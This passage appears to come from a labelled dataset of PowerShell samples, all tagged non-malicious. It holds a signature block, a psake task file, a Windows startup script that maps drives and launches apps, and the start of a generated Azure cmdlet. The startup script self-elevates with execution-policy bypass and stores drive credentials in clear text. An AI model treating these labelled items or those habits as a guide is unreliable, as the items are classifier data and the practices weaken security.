X+UI6fUCh2v5RBpl50vr/oRdKto0futAnQ5M3fKUTiOhK6Zg6OUD5XvV5MWs1+Ny # Ydyk5qjSk/tnGOYlhoklBAwZsb/twaGCF5MwghePBgorBgEEAYI3AwMBMYIXfzCC # F3sGCSqGSIb3DQEHAqCCF2wwghdoAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAnROHQUszIayOrTBJFPrm9duaXV6g5iUCaT5kblWw7VgIGZkYqh7oC # GBMyMDI0MDUxNjE4NDQ0NS41OTVaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODkwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHpMIIHIDCCBQigAwIBAgITMwAAAe3hX8vV96VdcwABAAAB7TANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # NDFaFw0yNTAzMDUxODQ1NDFaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODkwMC0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQCoMMJskrrqapycLxPC1H7zD7g88NpbEaQ6SjcTIRbz # CVyYQNsz8TaL1pqFTEAPL1X7ojL4/EaEW+UjNqZs/ayMyW4YIpFPZP2x4FBMVCdd # seF2i+aMMjDHi0LcTQZxM2s3mFMrCZAWSfLYXYDIimFBz8j0oLWGy3VgLmBTKM4x # Lqv7DZUz8B2SoAmbEtp62ngSl0hOoN73SFwE+Y24SvGQMWhykpG+vXDwcpWvwDe+ # TgnrLR7ATRFXN5JS26dm2yy6SYFMRYnME3dMHCQ/UQIQQNC8nLmIvdKkAoWEMXtJ # sGEo3QrM2S2SBv4PpHRzRukzTtP+UAceGxM9JyrwUQP5OCEmW6YchEyRDSwP4hU9 # f7B0Ayh14Pw9vJo7jewNjeMPIkmneyLSi0ruv2ox/xRGtcJ9yBNC5BaRktjz7stP # aojR+PDA2fuBtCo8xKlkt53mUb7AY+CZHHqhLm76pdMF6BHv2TvwlVBeQRN22Xja # VVRwCgjgJnNewt7PejcrpUn0qHLgLq+1BN1DzYukWkTr7wT0zl0iXr+NtqUkWSOn # WRfe8N21tB6uv3VkW8nFdChtbbZZz24peLtJEZuNrN8Xf9PTPMzZXDJBI1EciR/9 # 1QcGoZFmVbFVb2rUIAs01+ZkewvbhmGVDefX9oZG4/K4gGUsTvTW+r1JZMxUT2Mw # qQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM4b8Oz33hAqBEfKlAZf0NKh4CIZMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCd1gK2Rd+eGL0eHi+iE6/qDY8sbbsO4ema # ncp6KPN+xq5ZAatiBR4jmRRhm+9Vik0Fo0DLWi/N28bFI7dXYw09p3vCipbjy4Eo # ifm0Nud7/4U30i9+7RvW7XOQ3rx37+U7vq9lk6yYpGCNp0jlJ188/CuRPgqJnfq5 # EdeafH2AoG46hKWTeB7DuXasGt6spJOenGedSre34MWZqeTIQ0raOItZnFuGDy4+ # xoD1qRz2QW+u2gCHaG8AQjhYUM4uTi9t6kttj6c7Xamr2zrWuceDhz7sKLttLTJ7 # ws5YrA2I8cTlbMAf2KW0GVjKbYGd+LZGduEK7/7fs4GUkMqc51FsNdG1n+zgc7zH # u2oGGeCBg4s8ZR0ZFyx7jsgm9sSFCKQ5CsbAvlr/60Ndk5TeMR8Js2kNUicu2CqZ # 03833TsvTgk7iD1KLgfS16HEvjN6m4VKJKgjJ7OJJzabtS4JQgUnJrIZfyosk4D1 # 8rZni9pUwN03WgTmd10WTwiZOu4g8Un6iKcPMY/iFqTu4ntkzFUxBBpbFG6k1CIN # ZmoirEWmCtG3lyZ2IddmjtIefTkIvGWb4Jxzz7l2m/E2kGOixDJHsahZVmwsoNvh # y5ku/inU++dXHzw+hlvqTSFT89rIFVhcmsWPDJPNRSSpMhoJ33V2Za/lkKcbkUM0 # SbQgS9qsdzCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNM # MIICNAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjg5MDAtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQDu # HayKTCaYsYxJh+oWTx6uVPFw+aCBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6fCpBjAiGA8yMDI0MDUxNjE1NDcx # OFoYDzIwMjQwNTE3MTU0NzE4WjBzMDkGCisGAQQBhFkKBAExKzApMAoCBQDp8KkG # AgEAMAYCAQACAR0wBwIBAAICE5swCgIFAOnx+oYCAQAwNgYKKwYBBAGEWQoEAjEo # MCYwDAYKKwYBBAGEWQoDAqAKMAgCAQACAwehIKEKMAgCAQACAwGGoDANBgkqhkiG # 9w0BAQsFAAOCAQEAKLUEYAaQZ6/zz+qYEu8Koq3Bt2jyf93YcBD2i2baSqrRmTI/ # 6t5W4hPXJo/2tsbRjcZOaUkEIMOC3kxrJWKav858+s/tum+BWRXHxxTYYGeJTmMW # HwKbjrrvc9fPHVgzK+B2lzGhIAu9SeyRS2U4BUWJrhm9A7udY8O+/yxjhogxiJD0 # lLlo+qQ95q1etrDEKyV1pzzwTAyMUQ78TXH0UVBrvE2aAqWYzG8g1TDI0BSwu5up # 7hcgKVwcpXiB+hIaSlNoCd3JNu4m/haBa7ZUbYWqQNfTyzWdwNBj7ZG8CMJYgMI7 # 89hfxbeHQUZb8n/zaNaiI35BS4AmxtbHqdOZnjGCBA0wggQJAgEBMIGTMHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB7eFfy9X3pV1zAAEAAAHtMA0G # CWCGSAFlAwQCAQUAoIIBSjAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwLwYJ # KoZIhvcNAQkEMSIEIJQ+f/wNoYMlywHa/JcUNYawjl7fKpbipkoQQBV8Ips7MIH6 # BgsqhkiG9w0BCRACLzGB6jCB5zCB5DCBvQQgjS4NaDQIWx4rErcDXqXXCsjCuxIO # tdnrFJ/QXjFsyjkwgZgwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MAITMwAAAe3hX8vV96VdcwABAAAB7TAiBCBUOBDHA7PYgKlrCICmQQq8BVN5m64z # qFPgCuLfD8GIkTANBgkqhkiG9w0BAQsFAASCAgATRh2KX20spfWDc1f8zkLQJcqL # Y+dzju2Sv8Ad5h+GmZwUoqQKBUEH86R++yMuFcEgWS2b1PIr4g7LNw9zrp/LowFO # OXx8MCligSBBGRdPUSnIMhTpVVD08ib9Vq9cjXmJDqFytw7XVm9bhJ33xj3NjWeN # DT9slappRQVYg7GvFQ2kMZ037hVhPgxzz64a6F7UN4lXkkgAPB2rGLn55To9LVkx # FjT37KkFX2RFgR1VV1QuvIGgBOwUi+Ywp8nuwLbeI0/vHVCHm63+23cYJn/KYMxw # TVQo9JiDW+txt+3L6bAs0epFDK1iwngGW31DI3NhKDND/+krt+c4y8MzUwbhOnsH # p3tZittW8P9MJx+H+Ooa4uxbsoL5PIB92hZ1GS8wO1HwFHEq3wyVbocMXXJeVUi/ # q/D5ko2tIsyyXbVXAAukF6V73auIejL6RlfpJYokFhG/qoG4ELUlm/XqBaxnNdSD # 12pHMoobI/HfgkGZ3uHdznHRF8GSuTQM0VHjFAa2Q32l9+VetJoNgSqVUAKCEzIP # DpeRJbYst6B/7fS/IFYB/35Oaiuq/WzWpstvOM/Uc8PBfmOfMHZll0ipRWrJryUa # xB1Ina9Oul4q8jrZKO/wWFrxqwQSK+oYAmWcRk957zngcwtM+HFSGCbtcYcEgQV0 # xdMrOo9lkS27OMzrZw== # SIG # End signature block
combined_dataset/train/non-malicious/2873.ps1
2873.ps1
Task Default -depends Compile,Test Task Compile -depends CompileSolutionA,CompileSolutionB Task Test -depends UnitTests,IntegrationTests Task CompileSolutionA -description 'Compiles solution A' {} Task CompileSolutionB {} Task UnitTests -alias 'ut' {} Task IntegrationTests {}
combined_dataset/train/non-malicious/Windows Startup Script_5.ps1
Windows Startup Script_5.ps1
<#====================================================================================== File Name : Startup.ps1 Original Author : Kenneth C. Mazie : Description : This is a Windows start-up script with pop-up notification and checks to : assure things are not executed if already running or set. It can be run : as a personal start-up script or as a domain start-up (with some editing). : It is intended to be executed from the Start Menu "All Programs\\Startup" folder. : : The script will Start programs, map shares, set routes, and can email the results : if desired. The email subroutine is commented out. You'll need to edit it yourself. : When run with the "debug" variable set to TRUE it also displays status in the : PowerShell command window. Other wise all operation statuses are displayed in pop-up : balloons near the system tray. : : To call the script use the following in a shortcut or in the RUN registry key. : "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden ¢Noninteractive -NoLogo -Command "&{C:\\Startup.ps1}" : Change the script name and path as needed to suit your environment. : : Be sure to edit all sections to suit your needs before executing. Be sure to : enable sections you wish to run by un-commenting them at the bottom of the script. : : Route setting is done as a function of selecting a specific Network Adapter with the intent : of manually altering your routes for hardline or WiFi connectivity. This section you will : need to customize to suit your needs or leave commented out. This allowed me to : alter the routing for my office (Wifi) or lab (hardline) by detecting whether my : laptop was docked or not. The hardline is ALWAYS favored as written. : : To identify process names to use run "get-process" by itself to list process : names that PowerShell will be happy with, just make sure each app you want to : identify a process name for is already running first. : : A 2 second sleep delay is added to smooth out processing but can be removed if needed. : Notes : Sample script is safe to run as written, it will only load task manager and Firefox. : All notification options are enabled. For silent operation change them to $FALSE. : Many commands are one-liner style, sorry if that causes you grief. : Warnings : Drive mapping passwords are clear text within the script. : : Last Update by : Kenneth C. Mazie (email kcmjr AT kcmjr.com for comments or to report bugs) Version History : v1.0 - 05-03-12 - Original Change History : v2.0 - 11-15-12 - Minor edits : v3.0 - 12-10-12 - Converted application commands to arrays : v4.0 - 02-14-13 - Converted all other sections to arrays : v4.1 - 02-17-13 - Corrected error with pop-up notifications : v5.0 - 03-05-13 - Changed notifications into functions as well as : load routines. Added extra load options. Fixed bugs. : =======================================================================================#> clear-host $ErrorActionPreference = "silentlycontinue" $Debug = $True #--[ Set to false to disable local console messages ]-- $PopUp = $True #--[ Set to false to disable pop-up messages ]-- $CloudStor = $True $ScriptName = "Mazie Startup Script" $UserPath = $env:userprofile $WinDir = $env:windir #--[ Prep Pop-up Notifications ]-- [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing") $Icon = [System.Drawing.SystemIcons]::Information $Notify = new-object system.windows.forms.notifyicon $Notify.icon = $Icon #--[ NOTE: Available tooltip icons are = warning, info, error, and none $Notify.visible = $true Function Notifications { #--[ Arguements: 0=delay, 1=message, 2=debug message color, 3=debug message (if different) ]-- if ($Args[3] -eq ""){$Args[3] = $Args[1]} if ($PopUp){$Notify.ShowBalloonTip($Args[0],$ScriptName,$Args[1],[system.windows.forms.tooltipicon]::Info)} if ($debug){write-host $Args[3] -ForegroundColor $Args[2] } } #--[ Force to execute with admin priviledge ]-- $identity = [Security.Principal.WindowsIdentity]::GetCurrent() $principal = new-object Security.Principal.WindowsPrincipal $identity if ($principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $false) {$Args = '-noprofile -nologo -executionpolicy bypass -file "{0}"' -f $MyInvocation.MyCommand.Path;Start-Process -FilePath 'powershell.exe' -ArgumentList $Args -Verb RunAs;exit} Notifications "2500" "Script is running with full admin priviledges..." "DarkCyan" "`n------[ Running with Admin Privileges ]------`n" Notifications "2500" "Script is running in DEBUG mode..." "DarkCyan" "" Function Instances([string]$process) { @(Get-Process $process -ErrorAction 0).Count #--[ For Powershell v3 use $ps = get-process "processname";$ps.count ]-- } function Pause-Host { #--[ Only use if you need a countdown timer ]-- param($Delay = 10) $counter = 0; While(!$host.UI.RawUI.KeyAvailable -and ($Delay-- -ne $counter )) #--count down #While(!$host.UI.RawUI.KeyAvailable -and ($counter++ -lt $Delay )) #--count up { clear-host if ($debug){Write-Host "testing... $Delay"} #--count down #Write-Host "testing... $counter" #--count up [Threading.Thread]::Sleep(1000) } } Function SetRoutes { #--[ Array consists of Network, Mask ]-- $RouteArray = @() $RouteArray += , @("10.0.0.0","255.0.0.0") $RouteArray += , @("172.1.0.0","255.255.0.0") $RouteArray += , @("192.168.1.0","255.255.255.0") #--[ Add more route entries here... ]-- $Index = 0 Do { $RouteNet = $ShareArray[$Index][0] $RouteMask = $ShareArray[$Index][1] iex "route delete $RouteNet" Sleep (2) iex "route add $RouteNet mask $RouteMask $IP" Sleep (2) $Index++ } While ($Index -lt $RouteArray.length) } Function SetMappings { #--[ Array consists of Drive Letter, Path, User, and Password ]-- Notifications "10000" "Stand by, attempting to map drives..." "Yellow" "" $ShareArray = @() $ShareArray += , @("J:","\\\\192.168.1.250\\Share1","username","password") $ShareArray += , @("K:","\\\\192.168.1.250\\Share2","username","password") #--[ Add more mapping entries here... ]-- $Index = 0 Do { $MapDrive = $ShareArray[$Index][0] $MapPath = $ShareArray[$Index][1] $MapUser = $ShareArray[$Index][2] $MapPassword = $ShareArray[$Index][3] $net = $(New-Object -Com WScript.Network) if ( Exists-Drive $MapDrive){$Notify.ShowBalloonTip(2500,$ScriptName,"Drive $MapDrive is already mapped...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Drive $MapDrive already mapped" -ForegroundColor DarkRed}}else{if (test-path $MapPath){$net.MapNetworkDrive($MapDrive, $MapPath, "False",$MapUser,$MapPassword);$Notify.ShowBalloonTip(2500,$ScriptName,"Mapping Drive $MapDrive...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Mapping Drive $MapDrive" -ForegroundColor DarkGreen}}else{$Notify.ShowBalloonTip(2500,$ScriptName,"Cannot Map Drive $MapDrive - Target Not Found...",[system.windows.forms.tooltipicon]::Info);if ($debug){write-host "Cannot Map Drive $MapDrive - Target Not Found" -ForegroundColor DarkRed}}} Sleep (2) $Index++ }While ($Index -lt $ShareArray.length) } Function Exists-Drive { param($driveletter) (New-Object System.IO.DriveInfo($driveletter)).DriveType -ne 'NoRootDirectory' } Function LoadApps { #--[ Array consists of Process Name, File Path, Arguements, Title ]-- #--[ Single Instance Array ]-- $AppArray = @() $AppArray += , @("firefox","C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe","https://www.google.com","FireFox") #--[ Add more app entries here... ]-- #--[ Cloud Storage Provider Subsection ]-- if (!$CloudStor ){Notifications "2500" "Cloud Providers Bypassed..." "Magenta" ""} else { $AppArray += , @("googledrivesync","C:\\Program Files (x86)\\Google\\Drive\\googledrivesync.exe","/autostart","GoogleDrive") #--[ Add more cloud entries here... ]-- } $AppArray += , @("taskmgr","C:\\Windows\\System32\\taskmgr.exe","Ā","Task Manager") #--[ Add more app entries here... ]-- $Index = 0 Do { $AppProcess = $AppArray[$Index][0] $AppExe = $AppArray[$Index][1] $AppArgs = $AppArray[$Index][2] $AppName = $AppArray[$Index][3] If (Test-Path $AppExe){ If((get-process -Name $AppProcess -ea SilentlyContinue) -eq $Null){ if ($AppArgs -eq ""){ Notifications "2500" "$AppName is loading..." "DarkGreen" "";start-process -FilePath $AppExe} else { Notifications "2500" "$AppName is loading..." "DarkGreen" "";start-process -FilePath $AppExe -ArgumentList $AppArgs } Do {Sleep (2)} Until ((get-process -Name $AppProcess -ea SilentlyContinue) -ne $Null) Notifications "2500" " $AppName loaded..." "DarkGreen" "" }else{ Notifications "2500" "$AppName is already running..." "DarkRed" "" } sleep (2) }Else{ Notifications "2500" "$AppName was NOT found..." "Red" "" sleep (2) } $Index++ } Until ($Index -ge $AppArray.Count) #--[ Multiple Instance Array. No check for running process ]-- $AppArray = @() #$AppArray += , @("VpxClient","C:\\Program Files (x86)\\VMware\\Infrastructure\\Virtual Infrastructure Client\\Launcher\\VpxClient.exe","-s virtualcenter -passthroughAuth","MAIN vSphere Client") #$AppArray += , @("VpxClient","C:\\Program Files (x86)\\VMware\\Infrastructure\\Virtual Infrastructure Client\\Launcher\\VpxClient.exe","-s vwvirtualcenter -passthroughAuth","VIEW vSphere Client") #$AppArray += , @("VpxClient","C:\\Program Files (x86)\\VMware\\Infrastructure\\Virtual Infrastructure Client\\Launcher\\VpxClient.exe","-s drvirtualcenter -passthroughAuth","DR vSphere Client") $Index = 0 If ($AppArray.count -ge 1){ Do { $AppProcess = $AppArray[$Index][0] $AppExe = $AppArray[$Index][1] $AppArgs = $AppArray[$Index][2] $AppName = $AppArray[$Index][3] if ($AppArgs -eq ""){ Notifications "2500" "$AppName is loading..." "DarkGreen" "";start-process -FilePath $AppExe }else{ Notifications "2500" "$AppName is loading..." "DarkGreen" "";start-process -FilePath $AppExe -ArgumentList $AppArgs } Do {Sleep (2)} Until ((get-process -Name $AppProcess -ea SilentlyContinue) -ne $Null) Notifications "2500" " $AppName loaded..." "DarkGreen" "" Sleep (2) $Index++ } Until ($Index -ge $AppArray.Count) } } <# function SendMail { #param($strTo, $strFrom, $strSubject, $strBody, $smtpServer) param($To, $From, $Subject, $Body, $smtpServer) $msg = new-object Net.Mail.MailMessage $smtp = new-object Net.Mail.SmtpClient($smtpServer) $msg.From = $From $msg.To.Add($To) $msg.Subject = $Subject $msg.IsBodyHtml = 1 $msg.Body = $Body $smtp.Send($msg) } #> Function IdentifyNics { $Domain1 = "LabDomain.com" $Domain2 = "OfficeDomain.com" #--[ Detect Network Adapters ]-- $Wired = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.IPAddress -like "192.168.1.*" } #--[ Alternate detection methods]-- #$Wired = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.IPAddress -like "192.168.1.*" } | where {$_.DNSDomainSuffixSearchOrder -match $Domain2} #$Wired = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.Description -like "Marvell Yukon 88E8056 PCI-E Gigabit Ethernet Controller" } $WiredIP = ([string]$Wired.IPAddress).split(" ") $WiredDesc = $Wired.Description if ($debug){ write-host "Name: " $Wired.Description`n"DNS Domain: " $Wired.DNSDomainSuffixSearchOrder`n"IPv4: " $WiredIP[0]`n"IPv6: " $WiredIP[1]`n"" if ($WiredIP[0]){Notifications "2500" "Detected $WiredDesc" "DarkRed" ""}else{Notifications "2500" "Hardline not detected..." "Red" ""} } sleep (2) $WiFi = get-wmiobject -class "Win32_NetworkAdapterConfiguration" | where {$_.Description -like "Intel(R) Centrino(R) Advanced-N 6250 AGN" } $WiFiIP = ([string]$WiFi.IPAddress).split(" ") $WiFiDesc = $WiFi.Description write-host "Name: " $WiFi.Description`n"DNS Domain: " $WiFi.DNSDomainSuffixSearchOrder`n"IPv4: " $WiFiIP[0]`n"IPv6: " $WiFiIP[1] if ($WiFiIP[0]){Notifications "2500" "Detected $WiFiDesc" "DarkRed" ""}else{Notifications "2500" "WiFi not detected..." "Red" ""} sleep (2) #--[ Set Routes ]-- if ($WiredIP[0]) { #--[ The hardline is connected. Favor the hardline if both connected ]-- $IP = $WiredIP[0] if ($Wired.DNSDomainSuffixSearchOrder -like $Domain1 -or $Wired.DNSDomainSuffixSearchOrder -like $Domain2) { #--[ the hardline is connected ]-- write-host ""`n"Setting routes for hardline"`n"" Notifications "2500" "Setting routes for hardline..." "DarkRed" #SetRoutes $IP } } else { if ($WiFiIP[0]) { if ($WiFi.DNSDomainSuffixSearchOrder -like $Domain2) { #--[ The wifi is connected --] $IP = $WiFiIP[0] write-host ""`n"Setting routes for wifi"`n"" Notifications "2500" "Setting routes for wifi..." "DarkRed" #SetRoutes $IP } } } } #Write-Host $IP #IdentifyNics #SetMappings #Pause-Host LoadApps Notifications "2500" "Completed All Operations..." "DarkCyan" ""
combined_dataset/train/non-malicious/sample_36_45.ps1
sample_36_45.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Lists all of the available Automanage REST API operations. .Description Lists all of the available Automanage REST API operations. .Example {{ Add code here }} .Example {{ Add code here }} .Outputs Microsoft.Azure.PowerShell.Cmdlets.Automanage.Models.Api20.IOperation .Link https://learn.microsoft.com/powershell/module/az.automanage/get-azautomanageoperation #> function Get-AzAutomanageOperation { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.Automanage.Models.Api20.IOperation])] [CmdletBinding(DefaultParameterSetName='List', PositionalBinding=$false)] param( [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Automanage.Category('Azure')] [System.Management.Automation.PSObject] # The DefaultProfile parameter is not functional. # Use the SubscriptionId parameter when available if executing the cmdlet against a different subscription. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.Automanage.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.Automanage.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.Automanage.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline 